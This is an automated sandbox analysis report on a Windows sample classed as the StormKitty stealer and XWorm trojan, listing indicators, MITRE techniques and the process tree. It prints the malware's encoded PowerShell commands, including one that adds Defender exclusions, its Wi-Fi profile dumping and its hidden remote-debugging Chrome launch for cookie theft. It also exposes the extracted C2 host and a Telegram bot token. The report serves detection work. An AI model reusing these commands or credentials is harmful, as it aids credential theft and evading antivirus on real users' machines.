stormkitty | b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba

Analysis

max time kernel
103s
max time network
107s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
30/03/2025, 21:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sdsds.exe
Size

307KB
MD5

520f8ed0d73dbc6540fc80ac0c3847e1
SHA1

81476c36b9ea1b6d18864b90310eb95ec20e5475
SHA256

b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba
SHA512

0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4
SSDEEP

6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG

Score

10^/10

stormkitty xworm collection credential_access defense_evasion discovery persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:38960

metherium-38960.portmap.host:38960

Attributes

Install_directory
%AppData%
install_file
host.exe
telegram
https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002100000002ae0e-4.dat	family_xworm
behavioral1/memory/4068-23-0x0000000000A20000-0x0000000000A3A000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002b229-19.dat	family_stormkitty
behavioral1/memory/3900-24-0x0000000000170000-0x00000000001AC000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1472	chrome.exe
5768	chrome.exe
388	chrome.exe
3788	chrome.exe
4768	chrome.exe

Executes dropped EXE 2 IoCs

pid	Process
4068	client.exe
3900	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ipinfo.io
3	ipinfo.io
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sdsds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4556	cmd.exe
3148	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
1940	powershell.exe
3208	powershell.exe
1940	powershell.exe
3208	powershell.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
1472	chrome.exe
1472	chrome.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe
3900	svchost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1472	chrome.exe
1472	chrome.exe
1472	chrome.exe
1472	chrome.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	4068	client.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	3900	svchost.exe
Token: SeShutdownPrivilege	1472	chrome.exe
Token: SeCreatePagefilePrivilege	1472	chrome.exe
Token: SeShutdownPrivilege	1472	chrome.exe
Token: SeCreatePagefilePrivilege	1472	chrome.exe
Token: SeShutdownPrivilege	1472	chrome.exe
Token: SeCreatePagefilePrivilege	1472	chrome.exe
Token: SeShutdownPrivilege	1472	chrome.exe
Token: SeCreatePagefilePrivilege	1472	chrome.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1472	chrome.exe
1472	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5448 wrote to memory of 3208	5448	sdsds.exe	81
PID 5448 wrote to memory of 3208	5448	sdsds.exe	81
PID 5448 wrote to memory of 3208	5448	sdsds.exe	81
PID 5448 wrote to memory of 1940	5448	sdsds.exe	83
PID 5448 wrote to memory of 1940	5448	sdsds.exe	83
PID 5448 wrote to memory of 1940	5448	sdsds.exe	83
PID 5448 wrote to memory of 4068	5448	sdsds.exe	85
PID 5448 wrote to memory of 4068	5448	sdsds.exe	85
PID 5448 wrote to memory of 3900	5448	sdsds.exe	86
PID 5448 wrote to memory of 3900	5448	sdsds.exe	86
PID 5448 wrote to memory of 3900	5448	sdsds.exe	86
PID 3900 wrote to memory of 4556	3900	svchost.exe	88
PID 3900 wrote to memory of 4556	3900	svchost.exe	88
PID 3900 wrote to memory of 4556	3900	svchost.exe	88
PID 4556 wrote to memory of 4660	4556	cmd.exe	91
PID 4556 wrote to memory of 4660	4556	cmd.exe	91
PID 4556 wrote to memory of 4660	4556	cmd.exe	91
PID 4556 wrote to memory of 3148	4556	cmd.exe	92
PID 4556 wrote to memory of 3148	4556	cmd.exe	92
PID 4556 wrote to memory of 3148	4556	cmd.exe	92
PID 4556 wrote to memory of 2156	4556	cmd.exe	93
PID 4556 wrote to memory of 2156	4556	cmd.exe	93
PID 4556 wrote to memory of 2156	4556	cmd.exe	93
PID 3900 wrote to memory of 3196	3900	svchost.exe	95
PID 3900 wrote to memory of 3196	3900	svchost.exe	95
PID 3900 wrote to memory of 3196	3900	svchost.exe	95
PID 3196 wrote to memory of 5480	3196	cmd.exe	97
PID 3196 wrote to memory of 5480	3196	cmd.exe	97
PID 3196 wrote to memory of 5480	3196	cmd.exe	97
PID 3196 wrote to memory of 248	3196	cmd.exe	98
PID 3196 wrote to memory of 248	3196	cmd.exe	98
PID 3196 wrote to memory of 248	3196	cmd.exe	98
PID 3900 wrote to memory of 1472	3900	svchost.exe	102
PID 3900 wrote to memory of 1472	3900	svchost.exe	102
PID 1472 wrote to memory of 3756	1472	chrome.exe	103
PID 1472 wrote to memory of 3756	1472	chrome.exe	103
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104
PID 1472 wrote to memory of 1776	1472	chrome.exe	104

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

C:\Users\Admin\AppData\Local\Temp\sdsds.exe
"C:\Users\Admin\AppData\Local\Temp\sdsds.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Users\Admin\AppData\Roaming\client.exe
  "C:\Users\Admin\AppData\Roaming\client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Users\Admin\AppData\Local\svchost.exe
  "C:\Users\Admin\AppData\Local\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - outlook_office_path
  - outlook_win_path
  PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4660
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3148
  - - C:\Windows\SysWOW64\findstr.exe
      findstr All
      4⤵
      System Location Discovery: System Language Discovery
      PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:5480
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:248
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaffe6dcf8,0x7ffaffe6dd04,0x7ffaffe6dd10
      4⤵
      PID:3756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1992,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1988 /prefetch:2
      4⤵
      PID:1776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1520,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2296 /prefetch:11
      4⤵
      PID:396
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2408,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2608 /prefetch:13
      4⤵
      PID:1400
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3304,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3316 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:388
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3324,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5768
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4336 /prefetch:9
      4⤵
      Uses browser remote debugging
      PID:3788
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4704,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4748 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4768
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4896 /prefetch:14
      4⤵
      PID:3336
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4884,i,1740937830876185392,14099158218092328368,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5032 /prefetch:14
      4⤵
      PID:6016

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Modify Authentication Process

T1556

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
dbc4158b09a0348739b264e2896dc9f7

SHA1
e5f408f73a71409f30ceb7dc9a255f12459fc855

SHA256
f50356b8dc22a925e9b868f1a86f71d9ba8679ea0af232fe539619e554f3be21

SHA512
063c864cf58402189713cf189a8267b89207a5aac85b1bcb4c11a4b6ee327cd20bac7d86d0bfc1e9de0934f9f1d1cd3bf5de96ec977ad674281cd76ca8a3e5d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
887ba50e593ed832849b1aa44766e298

SHA1
5461b443a15b493577d021e57bad7a2a710d5793

SHA256
ddc75947777929b34c97f2fd4be709fce1d634359971055fff297872299c2fc7

SHA512
3deac7bc0fe5077e62e3d487825a10579b034b54b192fad6a8e33450269922ea9a33030ea761617447808bb6c74b3cf3471530413b33dd37d6fac484285481a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

Filesize
81B

MD5
ea511fc534efd031f852fcf490b76104

SHA1
573e5fa397bc953df5422abbeb1a52bf94f7cf00

SHA256
e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

SHA512
f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

Filesize
4KB

MD5
666ba3a67d5e71e40dba4071906d5436

SHA1
632731034a27eb86a1b63988953263335953ea5a

SHA256
beeed75548482376fcc05cf6e555bd6f3ba8aebdf9910373fa26566db597b2c7

SHA512
5330cc01cb30b74a6b4c43f23f806d4eb34c8a94bbcb2144be2f0d9688d70f391541c6244059930a27f381fa34f2a5e97236ceba0126312f2c649b1d0411e48e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tw1evrts.uum.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\svchost.exe

Filesize
213KB

MD5
23b83fe86a71cfba0d920fc658b3e010

SHA1
c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc

SHA256
6259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf

SHA512
22a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3

Download Submit
C:\Users\Admin\AppData\Roaming\client.exe

Filesize
79KB

MD5
10db01a500572f3468f4302068d6db1e

SHA1
90589a587d2ea36451a11e650a7b0041807b3be8

SHA256
cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84

SHA512
c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9

Download Submit
memory/1940-74-0x0000000007440000-0x0000000007451000-memory.dmp

Filesize
68KB

Download
memory/1940-69-0x00000000074C0000-0x0000000007556000-memory.dmp

Filesize
600KB

Download
memory/1940-25-0x0000000002A10000-0x0000000002A46000-memory.dmp

Filesize
216KB

Download
memory/1940-118-0x0000000007570000-0x0000000007578000-memory.dmp

Filesize
32KB

Download
memory/1940-83-0x0000000007580000-0x000000000759A000-memory.dmp

Filesize
104KB

Download
memory/1940-50-0x0000000005F00000-0x0000000005F4C000-memory.dmp

Filesize
304KB

Download
memory/1940-81-0x0000000007490000-0x00000000074A5000-memory.dmp

Filesize
84KB

Download
memory/1940-79-0x0000000007480000-0x000000000748E000-memory.dmp

Filesize
56KB

Download
memory/1940-53-0x0000000006ED0000-0x0000000006F04000-memory.dmp

Filesize
208KB

Download
memory/1940-54-0x0000000070BA0000-0x0000000070BEC000-memory.dmp

Filesize
304KB

Download
memory/1940-63-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/1940-64-0x0000000006F10000-0x0000000006FB4000-memory.dmp

Filesize
656KB

Download
memory/1940-67-0x00000000072C0000-0x00000000072CA000-memory.dmp

Filesize
40KB

Download
